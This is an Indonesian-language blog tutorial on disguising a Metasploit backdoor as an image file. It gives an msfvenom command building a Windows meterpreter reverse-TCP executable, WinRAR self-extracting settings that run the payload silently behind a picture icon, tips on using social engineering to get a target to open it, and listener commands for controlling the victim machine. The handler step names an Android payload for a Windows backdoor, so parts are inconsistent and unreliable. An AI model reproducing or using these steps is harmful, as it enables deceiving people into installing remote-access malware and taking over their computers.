Cara Menyisipkan Backdoor Ke Gambar (steganografi)

Posted on 13 Mei 2020 by Arief R
cara menyisipkan backdoor ke gambar

Menyembunyikan backdoor adalah salah satu usaha agar kita bisa menjalankan hacking dengan lancar. Berikut ini adalah cara menyisipkan backdoor ke gambar untuk mengelabuhi target.

Untuk informasi! cara menyisipkan backdoor ke gambar disebut juga dengan steganografi.

Dan untuk backdoor yang akan digunakan kali ini masih dari metasploit. Sama seperti tutorial menyisipkan backdoor ke aplikasi sebelumnya.

Jadi silahkan pelajari dulu cara membuat backdoor menggunakan metasploit agar kalian bisa mengikuti tutorial ini dengan baik.

Hal yang akan kita lakukan dalam menyisipkan backdoor ke gambar adalah sebagai berikut.

  1. Membuat backdoor di metasploit
  2. Mengconversi file gambar (jpg,png) ke file .Ico
  3. Membuat file self extracting dengan icon gambar .Ico

Self extracting artinya saat ikon dari file ini di klik, secara otomatis file compress yang ada didalam akan langsung terekstrak dengan sendirinya.

Ikon file nya adalah gambar .Ico
file compress nya adalah gambar biasa dan backdoor.

Jadi saat gambar .ico di klik yang akan muncul adalah gambar biasa dan backdoor akan berjalan.

Pahamkan, cara kerja nya?

Namun sayangnya, gambar .Ico hanya support untuk windows (komputer). Jadi jika backdoor dalam bentuk gambar dikirimkan ke android tidak akan berpengaruh apa-apa.

Oke, untuk langkah-langkahnya silahkan kalian ikuti dibawah ini.

Cara Menyisipkan Backdoor Ke Gambar Menggunakan Metasploit.

Bagi yang belum punya tool hack ini, silahkan pelajari cara install metasploit terlebih dahulu.

Selanjutnya langsung buat apk backdoor dan masukkan kedalam gambar.

1. Buat backdoor di metasploit

Karena ini backdoor untuk window jadi kalian langsung saja masukan 1 baris perintah berikut ini.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.245 LPORT=4444 -f exe > virus.exe

# Virus.exe bisa kalian ubah menjadi nama lain, asalkan belakang nya tetap .exe.
# LHOST ganti dengan IP address kalian.
# LPORT sesuaikan saja.

Setelah backdoor berhasil dibuat, pindahkan ke penyimpanan internal.

2. Convert gambar menjadi .Ico

Kalian bisa memanfaatkan website http://icoconvert.com/

Langsung saja pada halaman awal website, upload gambar yang ingin disisipi backdoor.

upload gambar ke .ico converter
upload gambar ke .ico converter

Selanjutnya tekan convert .ico dan download hasil convert nya.

ico converter
ico converter

3. Compress gambar dan backdoor dengan ikon gambar.ico

Disini kita bisa menggunakan win rar, karena sudah ada opsi sfx (self extracting) archive nya.

Untuk panduannya silahkan kalian ikuti saja dengan gambar berikut.

  1. Tandai file backdoor dan gambar biasa lalu compress
    compress file gambar dan backdoor
  2. Pada opsi general WinRAR pilih best dan centang create sfx archive dan tekan ok
    best compress dan create sfx archive
  3. Geser ke menu advance dan pilih sfx option
    menu advance dan sfx option
  4. Pilih lagi menu setup dan pada kotak run after extraction tuliskan nama file backdoor dan file gambar biasa lalu ok
    menu setup dan kotak run after extraction
  5. Kemudian geser ke menu text and icon dan pada kotak load sfx icon from the file pilih gambar .Ico hasil convert sebelumnya
    menu text and icon
  6. Selanjutnya geser lagi ke menu modes dan pilih opsi hide all
    menu modes dan opsi hide all

Sampai disini backdoor sudah berhasil dimasukkan kedalam gambar.

Langkah selanjutnya tinggal mengirimkan backdoor ke target kalian.

Bagaimana cara kirim backdoor ke target?

Terserah kalian saja, yang penting bisa ada di perangkat target dan pastikan target juga membukanya.

Sebagai tips! Gunakan teknik hacking social engineering agar kalian bisa dengan mudah mengirimkan file gambar tersebut.

Apa yang harus dilakukan setelah gambar berisi backdoor ada di perangkat target?

Kalian tinggal menghubungkan backdoor tersebut dengan metasploit.

Caranya masuk ke metasploit terlebih dahulu dengan perintah berikut.

msfconsole

Selanjutnya masukan lagi perintah berikut ini.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.245
set lport 4444
exploit

LHOST dan LPORT sesuaikan dengan yang kalian gunakan sebelumnya saat membuat backdoor.

Nah, jika sudah muncul meterpreter di metasploit kalian, itu artinya backdoor sudah terhubung.

metasploit meterpreter (backdoor sudah terhubung)

Selanjutnya tinggal memasukkan perintah apa yang kalian inginkan.

Misalnya untuk mengetahui perangkat apa yang digunakan terget, kalian bisa memasukkan perintah sysinfo

Dan jika ingin melakukan screenshot perangkat target, gunakan perintah screenshot.

Untuk perintah Exploit lainnya, silahkan lihat di metasploit help. Atau langsung cari tau di website resminya di metasploit.com


Oke sekarang kita sudah belajar cara menyisipkan backdoor ke gambar, sangat mudah dipahami kan? sekaran giliran kalian untuk mempraktekkannya.

Apabila ada kesulitan, silahkan tanyakan saja melalui kolom komentar. Terimakasih sudah membaca.

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *